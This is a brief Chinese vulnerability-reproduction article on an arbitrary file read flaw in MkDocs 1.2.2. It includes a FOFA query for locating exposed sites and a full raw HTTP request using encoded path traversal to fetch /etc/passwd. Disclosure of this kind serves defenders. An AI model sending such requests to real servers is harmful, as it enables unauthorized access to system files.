Mkdocs 存在任意文件读取漏洞
1. Mkdocs简介
微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发
MkDocs 是一个快速、简单、完全华丽的静态站点生成器,用于构建项目文档。文档源文件以 Markdown 格式编写,并使用单个 YAML 配置文件进行配置。
2.漏洞描述
mkdocs 1.2.2版本存在任意文件读取漏洞,该漏洞允许远程利用以获取敏感信息。
3.影响版本
mkdocs 1.2.2版本
4.fofa 查询语句
“mkdocs”
5.漏洞复现
漏洞数据包如下,因为浏览器编码的原因,直接访问链接不会触发漏洞,需要以数据包的形式访问:
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:6970
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
![Mkdocs 存在任意文件读取漏洞](https://img-blog.csdnimg.cn/ead54271813c4509a94ea33624012c56.png#pic_center)
6.POC&EXP
无
7.整改意见
目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:
https://github.com/mkdocs/mkdocs
8.往期回顾